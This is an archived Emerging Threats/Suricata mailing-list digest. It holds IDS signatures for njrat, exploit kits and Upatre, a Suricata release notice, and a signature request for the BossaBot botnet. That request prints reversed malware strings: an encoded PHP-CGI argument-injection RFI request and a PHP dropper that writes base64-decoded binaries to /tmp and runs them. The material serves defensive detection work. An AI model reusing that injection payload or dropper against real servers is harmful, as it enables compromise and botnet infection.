Patrick Olsen | 23 Sep 15:08 2014

njrat version 0.7d sigs

All,

I downloaded the njrat version 0.7d builder this evening and generated a range of activities with it. I ran the latest ET trojan rules (specifically looking at ET TROJAN Bladabindi/njrat CnC) against two pcaps I have and didn't get any hits on them. I believe where the rules are falling short is the depth values that are set. They trigger on a few of them if you remove it. In either case I re-wrote the rules. 

They would only trigger if I had -k none (Checksum mode set to none). This was the case with a live pcap and my test/controlled pcap. 

The hash referenced is the archive of the njrat builder. You can download it from VT.

I decided to break them out into what the command issued is (Ex. Keylogging). All the return values are base64 encoded.

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)"; flow:from_client,established; content:!"GET|20|"; content:"|FF D8 FF E0 00 10 4A 46 49 46|"; fast_pattern; content:"|00|CAP|7c 27 7c 27 7c|"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100001; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Microphone)"; flow:from_client,established; content:"|00|MIC|7c 27 7c 27 7c|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100002; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)"; flow:from_client,established; content:"|00|MSG|7c 27 7c 27 7c|"; fast_pattern; content:"Executed As"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100003; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Remote Shell)"; flow:from_client,established; content:"|00|rs|7c 27 7c 27 7c|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100004; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Services Listing)"; flow:from_client,established; content:"|00|srv|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100005; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Registry Listing)"; flow:from_client,established; content:"|00|RG|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100006; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Process Listing)"; flow:from_client,established; content:"|00|proc|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100007; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (File Manager Actions)"; flow:from_client,established; content:"|00|fm|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100008; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Keylogging)"; flow:from_client,established; content:"|00|kl|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100009; rev:1;)

alert tcp any any -> any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback"; flow:from_client,established; content:"|00|ll|7C 27 7C 27 7C|"; fast_pattern; content:"0.7d"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100010; rev:1;)

Thanks,

Patrick
<div><div dir="ltr">All,<div><br></div>
<div>I downloaded the njrat version 0.7d builder this evening and generated a range of activities with it. I ran the latest ET trojan rules (specifically looking at ET TROJAN Bladabindi/njrat CnC) against two pcaps I have and didn't get any hits on them. I believe where the rules are falling short is the depth values that are set. They trigger on a few of them if you remove it. In either case I re-wrote the rules.&nbsp;</div>
<div><br></div>
<div>They would only trigger if I had -k none (Checksum mode set to none). This was the case with a live pcap and my test/controlled pcap.&nbsp;</div>
<div><br></div>
<div>The hash referenced is the archive of the njrat builder. You can download it from VT.</div>
<div><br></div>
<div>I decided to break them out into what the command issued is (Ex. Keylogging). All the return values are base64 encoded.</div>
<div><br></div>
<div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)"; flow:from_client,established; content:!"GET|20|"; content:"|FF D8 FF E0 00 10 4A 46 49 46|"; fast_pattern; content:"|00|CAP|7c 27 7c 27 7c|"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100001; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Microphone)"; flow:from_client,established; content:"|00|MIC|7c 27 7c 27 7c|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100002; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)"; flow:from_client,established; content:"|00|MSG|7c 27 7c 27 7c|"; fast_pattern; content:"Executed As"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100003; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Remote Shell)"; flow:from_client,established; content:"|00|rs|7c 27 7c 27 7c|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100004; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Services Listing)"; flow:from_client,established; content:"|00|srv|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100005; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Registry Listing)"; flow:from_client,established; content:"|00|RG|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100006; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Process Listing)"; flow:from_client,established; content:"|00|proc|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100007; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (File Manager Actions)"; flow:from_client,established; content:"|00|fm|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100008; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback (Keylogging)"; flow:from_client,established; content:"|00|kl|7C 27 7C 27 7C|"; fast_pattern; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100009; rev:1;)</div>
<div><br></div>
<div>alert tcp any any -&gt; any any (msg:"ET TROJAN njrat ver 0.7d Malware CnC Callback"; flow:from_client,established; content:"|00|ll|7C 27 7C 27 7C|"; fast_pattern; content:"0.7d"; reference:md5,bbc68c34bb2dac3ae382ecf785bdb441; classtype:trojan-activity; sid:100010; rev:1;)</div>
</div>
<div><br></div>
<div>Thanks,</div>
<div><br></div>
<div>Patrick</div>
</div></div>
Victor Julien | 23 Sep 13:35 2014
Picon

Suricata 2.0.4 Available!

The OISF development team is pleased to announce Suricata 2.0.4. This
release fixes a number of issues in the 2.0 series.

This update fixes a bug in the SSH parser, where a malformed banner
could lead to evasion of SSH rules and missing log entries. In some
cases it may also lead to a crash. Bug discovered and reported by
Steffen Bauch.

Additionally, this release also addresses a new IPv6 issue that can lead
to evasion. Bug discovered by Rafael Schaefer working with ERNW GmbH.

Get the new release here:
http://www.openinfosecfoundation.org/download/suricata-2.0.4.tar.gz

Changes

- Bug #1276: ipv6 defrag issue with routing headers
- Bug #1278: ssh banner parser issue
- Bug #1254: sig parsing crash on malformed rev keyword
- Bug #1267: issue with ipv6 logging
- Bug #1273: Lua - http.request_line not working
- Bug #1284: AF_PACKET IPS mode not logging drops and stream inline issue

Security

- CVE-2014-6603

Special thanks

We'd like to thank the following people and corporations for their
contributions and feedback:

- Rafael Schaefer working with ERNW GmbH
- Steffen Bauch -  <at> steffenbauch, http://steffenbauch.de/
- Bill Meeks

Known issues & missing features

If you encounter issues, please let us know! As always, we are doing our
best to make you aware of continuing development and items within the
engine that are not yet complete or optimal. With this in mind, please
notice the list we have included of known items we are working on. See
http://redmine.openinfosecfoundation.org/projects/suricata/issues for an
up to date list and to report new issues. See
http://redmine.openinfosecfoundation.org/projects/suricata/wiki/Known_issues
for a discussion and time line for the major issues.

About Suricata

Suricata is a high performance Network IDS, IPS and Network Security
Monitoring engine. Open Source and owned by a community run non-profit
foundation, the Open Information Security Foundation (OISF). Suricata is
developed by the OISF, its supporting vendors and the community.
--

-- 
---------------------------------------------
Victor Julien
http://www.inliniac.net/
PGP: http://www.inliniac.net/victorjulien.asc
---------------------------------------------

Kevin Ross | 23 Sep 10:57 2014

SIGS: Sweet Orange and Angler

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Sweet Orange Exploit Kit Traffic Gate"; flow:established,to_server; content:"/k?t="; http_uri; depth:5; pcre:"/^\x2Fk\x3Ft\x3D\d{10}$/U"; classtype:trojan-activity; reference:url,www.malware-traffic-analysis.net/2014/09/19/index.html; sid:193311; rev:1;)

# Seen this in many examples going back to at least Late May/June time so looks pretty consistant.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET CURRENT_EVENTS Angler Exploit Kit Fake HTTP Headers"; flow:established,to_client; content:"Expires|3A| Sat, 26 Jul 1997 05|3A|00|3A|00 GMT"; http_header; content:"Expires|3A| content:"Last-Modified|3A| Sat, 26 Jul 2040 05|3A|00|3A|00 GMT"; http_header; fast_pattern:15,20; classtype:trojan-activity; reference:url,www.malware-traffic-analysis.net/2014/09/22/index.html; sid:193312; rev:1;)

Kind Regards,
kevin Ross
<div><div dir="ltr">alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Sweet Orange Exploit Kit Traffic Gate"; flow:established,to_server; content:"/k?t="; http_uri; depth:5; pcre:"/^\x2Fk\x3Ft\x3D\d{10}$/U"; classtype:trojan-activity; reference:url,<a href="http://www.malware-traffic-analysis.net/2014/09/19/index.html">www.malware-traffic-analysis.net/2014/09/19/index.html</a>; sid:193311; rev:1;)<br><br># Seen this in many examples going back to at least Late May/June time so looks pretty consistant. <br><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -&gt; $HOME_NET any (msg:"ET CURRENT_EVENTS Angler Exploit Kit Fake HTTP Headers"; flow:established,to_client; content:"Expires|3A| Sat, 26 Jul 1997 05|3A|00|3A|00 GMT"; http_header; content:"Expires|3A| content:"Last-Modified|3A| Sat, 26 Jul 2040 05|3A|00|3A|00 GMT"; http_header; fast_pattern:15,20; classtype:trojan-activity; reference:url,<a href="http://www.malware-traffic-analysis.net/2014/09/22/index.html">www.malware-traffic-analysis.net/2014/09/22/index.html</a>; sid:193312; rev:1;)<br><br>Kind Regards,<br>kevin Ross<br>
</div>
</div></div>
Russell Fulton | 23 Sep 05:04 2014
Picon
Picon

duplicate rules -- sort of...

I am using the etpro 2.0.3 rules and I find that there are:

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"ET SCAN LibSSH? Based SSH Connection - Often used as a
BruteForce?Tool"; flow:established,to_server; content:"SSH-"; content:"libssh"; within:20;
threshold: type limit, track by_src, count 1, seconds 30;
reference:url,doc.emergingthreats.net/2006435; classtype:misc-activity; sid:2006435; rev:6;)

alert ssh $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN LibSSH2? Based SSH Connection - Often used as
aBruteForce? Tool"; flow:established,to_server; ssh.softwareversion:"libssh2-"; threshold:
type limit, track by_src, count 1, seconds 30; classtype:misc-activity; sid:2018689; rev:2;)

Both of which are triggering.  I take it the latter is taking advantage of the app-layer decoding.  Is it an
oversight that the former rule is still enabled.

Russell
Francis Trudeau | 22 Sep 23:31 2014
Picon

Daily Ruleset Update Summary 09/22/2014

 [***] Summary: [***]

 12 new Open signatures, 20 new Pro (12+8).  Linux/BillGates, Various
Android, Nuclear EK.

 Thanks:   <at> MalwareMustDie and  <at> abuse_ch

 [+++]          Added rules:          [+++]

 Open:

  2019202 - ET TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 2
(trojan.rules)
  2019203 - ET TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 3
(trojan.rules)
  2019204 - ET TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) (trojan.rules)
  2019205 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS C2) (trojan.rules)
  2019206 - ET TROJAN ABUSE.CH SSL Fingerprint Blacklist Malicious SSL
certificate detected (KINS CnC) (trojan.rules)
  2019207 - ET TROJAN Linux/BillGates Checkin (trojan.rules)
  2019208 - ET TROJAN Linux/BillGates Checkin Response (trojan.rules)
  2019209 - ET CURRENT_EVENTS DRIVEBY Nuclear EK PDF Struct (no alert)
(current_events.rules)
  2019210 - ET CURRENT_EVENTS DRIVEBY Nuclear EK PDF (current_events.rules)
  2019211 - ET TROJAN Win32/Badur.igh Checkin 2 (trojan.rules)
  2019212 - ET TROJAN Bossabot DDoS tool RFI attempt (trojan.rules)
  2019213 - ET CURRENT_EVENTS Possible Dyre SSL Cert Sept 22 2014
(current_events.rules)

 Pro:

  2808861 - ETPRO TROJAN Likely Win32/Spy.Zbot.AAQ .onion Proxy DNS
lookup (trojan.rules)
  2808862 - ETPRO MOBILE_MALWARE Android.Trojan.FakeInst.BX Checkin 4
(mobile_malware.rules)
  2808863 - ETPRO TROJAN TROJAN Win32/Seey.A Checkin (trojan.rules)
  2808864 - ETPRO MOBILE_MALWARE Android/InfoStealer.BL Checkin via
SMTP (mobile_malware.rules)
  2808865 - ETPRO TROJAN TROJAN Win32/Seey.A User-Agent (trojan.rules)
  2808866 - ETPRO TROJAN TROJAN Win32/Seey.A Checkin 2 (trojan.rules)
  2808867 - ETPRO WEB_CLIENT Possible Adobe Reader CVE-2014-0567
(web_client.rules)
  2808868 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Opfake.a Checkin
10 (mobile_malware.rules)

 [///]     Modified active rules:     [///]

  2019134 - ET CURRENT_EVENTS Flashpack Redirect Method 2 (current_events.rules)
  2019172 - ET TROJAN Linux.DDoS Checkin (trojan.rules)
  2019177 - ET TROJAN Linux/AES.DDoS Sending Real/Fake CPU&BW Info
(trojan.rules)
  2019185 - ET CURRENT_EVENTS Nuclear EK Gate Sep 16 2014 (current_events.rules)
  2807357 - ETPRO MOBILE_MALWARE Android/TrojanSMS.Agent.SD Checkin
(mobile_malware.rules)
  2808659 - ETPRO CURRENT_EVENTS FlashPack URI Struct Thread 2
Specific (current_events.rules)
  2808843 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.kh Checkin
2 (mobile_malware.rules)
  2808844 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.kh
Response 2 (mobile_malware.rules)

 [---]         Removed rules:         [---]

  2403321 - ET CINS Active Threat Intelligence Poor Reputation IP
group 22 (ciarmy.rules)
  2405062 - ET CNC Shadowserver Reported CnC Server Port 58914 Group 1
(botcc.portgrouped.rules)
  2803491 - ETPRO TROJAN Suspicious HTTP STOP Return -
Trojan.Win32.FakeAV.cfty or Related Controller (trojan.rules)
  2807626 - ETPRO TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND)
(trojan.rules)
  2807683 - ETPRO TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 2
(trojan.rules)
  2807710 - ETPRO TROJAN Backdoor.Win32.PcClient.bal CnC (OUTBOUND) 3
(trojan.rules)
Packet Sleuth | 22 Sep 14:28 2014
Picon

Upatre change

Attempted to send this late Friday, but it failed.  Wanted to get it in.  Haven't had time to test them yet.  This is being reported as Upatre by some of the AV vendors when submitted to Virus Total.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Upatre Suspicious User-Agent (Installer) with IP Host"; flow:established,to_server; content:"User-Agent|3a20|Installer|0d0a|; nocase; http_header; pcre: "/^User\x3a\sInstaller\r\nHost\x3a\s\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\r\n/Hi"; reference:md5,8f602ab1e9288adbb80a93e50bdbe144; classtype:trojan-activity; sid:xxxxxx; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET TROJAN Upatre downloading purported Tar file"; flow:to_client,established; content: "Content-Type|3a20|application/x-tar|0d0a|; nocase; http_header; content: "Vary|3a20|"; nocase; http_header; pcre: "/Vary\x3a\x20(Accept-Encoding,)?User-Agent\r\n\r\n/Hi"; reference:md5,8f602ab1e9288adbb80a93e50bdbe144; classtype: trojan-activity; sid:xxxxxx; rev:1;)

Regards,
Packet Sleuth
<div><div dir="ltr">
<div>Attempted to send this late Friday, but it failed.&nbsp; Wanted to get it in.&nbsp; Haven't had time to test them yet.&nbsp; This is being reported as Upatre by some of the AV vendors when submitted to Virus Total.</div>
<div><br></div>
<div>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Upatre Suspicious User-Agent (Installer) with IP Host"; flow:established,to_server; content:"User-Agent|3a20|Installer|0d0a|; nocase; http_header; pcre: "/^User\x3a\sInstaller\r\nHost\x3a\s\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\r\n/Hi"; reference:md5,8f602ab1e9288adbb80a93e50bdbe144; classtype:trojan-activity; sid:xxxxxx; rev:1;)</div>
<div><br></div>
<div>alert tcp $EXTERNAL_NET $HTTP_PORTS -&gt; $HOME_NET any (msg:"ET TROJAN Upatre downloading purported Tar file"; flow:to_client,established; content: "Content-Type|3a20|application/x-tar|0d0a|; nocase; http_header; content: "Vary|3a20|"; nocase; http_header; pcre: "/Vary\x3a\x20(Accept-Encoding,)?User-Agent\r\n\r\n/Hi"; reference:md5,8f602ab1e9288adbb80a93e50bdbe144; classtype: trojan-activity; sid:xxxxxx; rev:1;)</div>
<div><br></div>
<div>Regards,</div>
<div>Packet Sleuth</div>
</div></div>
Hendrik Adrian | 22 Sep 03:09 2014

Request #3 - ET Signature for Linux Bossabot

Hello Will,
CC: ..and ET friends,

There is one more request. A route of Kaiten base code DDoS'er, was recoded into an active evil botnet (IRC base), the actor called it as BossaBot. Assisting Mr. Malekal Morte I am in charge to reversing the ELF binaries, since 1st time the RFI attack spotted and botnet was spotted in some forum.

These are good chronological reference of the threat:
Malekal's report: http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/
My reversing in monitoring this ELF threat: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965
Spiderlabs posted about this threat too: http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html
...according to posts above you will see that the threat is important to handle.

If ET sig doesn't cover this threat yet..I would like to request the ET sig to block this RFI and the PHP infection (or "injection" is more like it). If you think you have, please see the below details, in case anything can be improved.

The problem of this proposal is, since the botnet attack request can only be activated from the actor's IRC, it is a bit difficult to simulate the attack to make a good capture PCAP (I tried many times), so there is no PCAP. But we have THREE information that can be used to replace the PCAP to generate sigs, as per follows:

(1) RFI and web file injection HTTP header injected log.

The log is available in here: http://pastebin.com/raw.php?i=KUTT2UQa < <at> undeadsecurity was doing a good work in recording this (a credit)

(2) The latest ELF binary I reversed, was spotted 2 days ago, contains the below data hard coded in the bins:

// RFI TO BE SENT HARD CODED:

.rodata:0x0408540 aPostS?2d64616c
.rodata:0x0408540   db 'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
.rodata:0x0408540   db '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
.rodata:0x0408540   db 'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
.rodata:0x0408540   db '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
.rodata:0x0408540   db '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
.rodata:0x0408540   db '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
.rodata:0x0408540   db '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
.rodata:0x0408540   db '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
.rodata:0x0408540   db '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
.rodata:0x0408540   db '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
.rodata:0x0408540   db '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
.rodata:0x0408540   db '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
.rodata:0x0408540   db '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
.rodata:0x0408540   db '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
.rodata:0x0408540   db '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
.rodata:0x0408540   db 'D%%6E HTTP/1.1',0Dh,0Ah

// ALSO THE ACCOMPANIED DROPPER SCRIPT

.rodata:0x0408540   db 'Host: %s',0Dh,0Ah
.rodata:0x0408540   db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 '
.rodata:0x0408540   db 'Firefox/31.0',0Dh,0Ah
.rodata:0x0408540   db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah
.rodata:0x0408540   db 'Content-Length: %d',0Dh,0Ah
.rodata:0x0408540   db 'Connection: close',0Dh,0Ah
.rodata:0x0408540   db 0Dh,0Ah
.rodata:0x0408540   db '%s',0
.rodata:0x04089D5   align 8
   
:
.rodata:0x04089D8 a?phpBufferfSBu
.rodata:0x04089D8   db '<?php',0Ah          ;
.rodata:0x04089D8   db '$bufferf = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$bufferf2 = ',27h,'%s',27h,';',0Ah
.rodata:0x04089D8   db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
.rodata:0x04089D8   db '$Vgxl4ifsipo5 = getcwd();',0Ah
.rodata:0x04089D8   db '$Vos03apkyec1 = "OIOIU74u";',0Ah
.rodata:0x04089D8   db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
.rodata:0x04089D8   db '$V5lgt4awdv3b = "chmod 777";',0Ah
.rodata:0x04089D8   db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',0Ah
.rodata:0x04089D8   db '{',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}else{',0Ah
.rodata:0x04089D8   db 'echo($Vdkqrxiiyr3t);',0Ah
.rodata:0x04089D8   db '$bufferf = base64_decode($bufferf);',0Ah
.rodata:0x04089D8   db '$bufferf2 = base64_decode($bufferf2);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);',0Ah
.rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);',0Ah
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
.rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
.rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
.rodata:0x04089D8   db 'exit(1);',0Ah
.rodata:0x04089D8   db '}',0Ah
.rodata:0x04089D8   db '?>',0Ah,0
.rodata:0x0408CE9   align 10h

Using the above (1) and (2) we can use the hard coded HTTP HEADER to be blocked by ET Sigs.
Moreover, there is one more vector to use as filtration (below):

(3) The injected ELF file to the /tmp directory

<?php
$bufferf
= 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
$bufferf2
= 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';

↑the above "$bufferf ="and "$buffer2 =" looks like a good spot to filter. But only new version is using this, old version is using different scheme (without PHP injection but PHP system command to wget the bins..)

If you need more confirmation, please do not hesitate to ask.
It will be nice if this threat also can be blocked.

Herewith I close the series of requests for ET sigs from MalwareMustDie, total 3 DDoS botnets signature. Look forward for the reply with thank you in advance.

Best regards always/Rick

--
Hendrik Adrian / <at> unixfreaxjp
PGP/MIT.EDU: RSA 2048/0xEC61AB9
http://about.me/unixfreaxjp

MalwareMustDie,NPO Research Group
Web http://malwaremustdie.org
Research blog: http://malwaremustdie.blogspot.com
Wiki & Code: http://code.google.com/p/malwaremustdie/
Report Pastes: http://pastebin.com/u/MalwareMustDie

This email is confidential and may be legally privileged. It is intended
as a confidential communication only for the person(s) named above.
Any other use or disclosure is prohibited.
If you have received this message in error, please delete it, disregard its contents.
<div><div dir="ltr">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>Hello Will,<br>CC: ..and ET friends,<br><br>There is one more request. A route of Kaiten base code DDoS'er, was recoded into an active evil botnet (IRC base), the actor called it as BossaBot. Assisting Mr. Malekal Morte I am in charge to reversing the ELF binaries, since 1st time the RFI attack spotted and botnet was spotted in some forum.<br><br>These are good chronological reference of the threat:<br>Malekal's report: <a href="http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/">http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/</a><br>My reversing in monitoring this ELF threat: <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=3476&amp;p=23965#p23965">http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=3476&amp;p=23965#p23965</a><br>Spiderlabs posted about this threat too: <a href="http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html">http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html</a><br>
</div>
<div>...according to posts above you will see that the threat is important to handle.<br>
</div>
<div>
<br>If ET sig doesn't cover this threat yet..I would like to request the ET sig to block this RFI and the PHP infection (or "injection" is more like it). If you think you have, please see the below details, in case anything can be improved.<br><br>The problem of this proposal is, since the botnet attack request can only be activated from the actor's IRC, it is a bit difficult to simulate the attack to make a good capture PCAP (I tried many times), so there is no PCAP. But we have THREE information that can be used to replace the PCAP to generate sigs, as per follows:<br>
</div>
<br>
</div>(1) RFI and web file injection HTTP header injected log.<br><br>
</div>The log is available in here: <a href="http://pastebin.com/raw.php?i=KUTT2UQa">http://pastebin.com/raw.php?i=KUTT2UQa</a> &lt;  <at> undeadsecurity was doing a good work in recording this (a credit)<br><br>
</div>(2) The latest ELF binary I reversed, was spotted 2 days ago, contains the below data hard coded in the bins:<br><br><div class=""><div class="">
<span class="">// RFI TO BE SENT HARD CODED:</span><span class=""><br><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> aPostS</span><span class="">?</span><span class="">2d64616c</span><span class=""> <br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span class="">'6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408540</span><span class=""> &nbsp; db </span><span 